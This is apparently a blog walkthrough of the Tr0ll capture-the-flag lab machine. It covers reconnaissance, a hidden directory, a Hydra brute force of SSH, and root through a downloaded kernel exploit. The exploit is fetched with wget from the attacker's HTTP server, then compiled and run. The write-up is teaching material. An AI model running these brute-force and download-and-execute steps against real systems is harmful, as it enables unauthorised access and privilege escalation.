Hello Everyone, In this blog i am posting the walkthrough of Tr0ll. This machine is for beginners.
You can Download the machine here.
So, let’s begin!!
Target IP is 192.168.43.199
Attacker IP is 192.168.43.139
Let’s scan the target ip using nmap .
nmap -sC -sV -pn 192.168.43.199
So, there are three ports open 21,22 and 80 and service running on them are ftp, ssh and http.
Let’s check on port 80 as some website is running on it.
huh!! it’s just an image Trolling us.
So, I used dirb if there are any hidden directories.
dirb http://192.168.43.199
here, is the result.
/secret/ looks interesting , let’s check this in the browser.
Hmm !! It Trolled us again.
I was curious to know what’s going on. So, i used Wireshark to analyze the packets.
I found some plain text in a packet, if we read it carefully it says “you almost found the sup3rs3cr3tdirlol “.
looks like sup3rs3cr3tdirlol is a directory. Let’s check opening this in a browser,
So, there is a file roflmao .
I downloaded it, its a LSB executable file.
With the help of the strings command i explored the file,
strings roflmao
Result says, Find address 0x0856BF to proceed .
Let’s check this in the browser,
It contain two folders goodluck/ and this_folder_contains_the_password/
Ok, Let’s open goodluck/ folder,
It contains a text file, it seems to be usernames.
The other folder this_folder_contains_the_password/ seems to contain passwords.
We got trolled again.
As the second folder itself says this_folder_contains_the_password, so i assumed “Pass.txt” might be the password.
So, I downloaded which_one_lol.txt .
Now, let’s Bruteforce ssh using the tool Hydra .
hydra -L which_one_lol.txt -p Pass.txt 192.168.43.199 ssh
Yes, it worked.
we got the login credentials for ssh. now, let’s login to the system.
We got shell, Now let’s enumerate to find the kernel version
lsb_release -a
Now, let’s find exploits for this verion.
So, i used a command searchsploit to find the exploits for the Version.
searchsploit 14.04
Let’s download the exploit 37292.c
searchsploit -m 37292.c
The exploit will be downloaded on your directory.
Now, all you have to do is make the exploit run on the user shell we got.
Let’s start HTTPServer .
python -m SimpleHTTPServer 8080
HTTP server is started on port 8080.
Let’s go back to shell and download the exploit using wget.
here, you should go to /tmp dir to download the exploit.
cd /tmp
wget http://192.168.43.139:8080/37292.c
Let’s Compile the exploit using gcc compiler and execute it.
gcc 37292.c -o exploit
chmod +x exploit
./exploit
Damn, i got ROOT access.
Writer: Anudeep is a Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.
Sir i wanna take a class for u
Hello Kartikay,
Fill this form: https://forms.gle/h6pAX6j3MwWasNdTA
My team will contact you shortly.